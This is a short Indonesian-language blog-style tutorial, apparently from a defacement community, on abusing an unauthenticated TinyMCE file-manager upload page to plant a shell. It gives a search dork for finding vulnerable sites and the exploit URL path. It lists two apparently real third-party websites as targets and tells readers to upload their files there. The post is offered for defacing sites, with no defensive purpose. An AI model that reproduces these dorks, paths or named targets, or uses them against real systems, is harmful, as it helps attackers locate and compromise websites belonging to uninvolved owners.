Vuln Plugin TinyMCE Insert File Upload Shell - Tutorial

Okay dengan saya lagi, saya ingin memberi beberapa Exploit yang menarik untuk di jadikan pembelajaran Deface.
Langsung saja kita bahas bersama.

Dork:
– inurl:filemanager/insertFile/
Use Your Head for many target!!


POC / Exploit :
http://[localhost]/Patch/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Setelah itu, maka akan tampil gambar berikut.
TinyMCE
Saya memberi beberapa target ny  hehe
– http://www.verslogalimybes.lt/javascript/libs/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://www.financialmilestones.com.au/wse/tinymce/jscripts/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Upload file kalian, lalu liat deh hasilnya
Preview ny bisa dilihat kalo sukses upload ny.
Okay segitu aja dulu ya
Good Luck ^^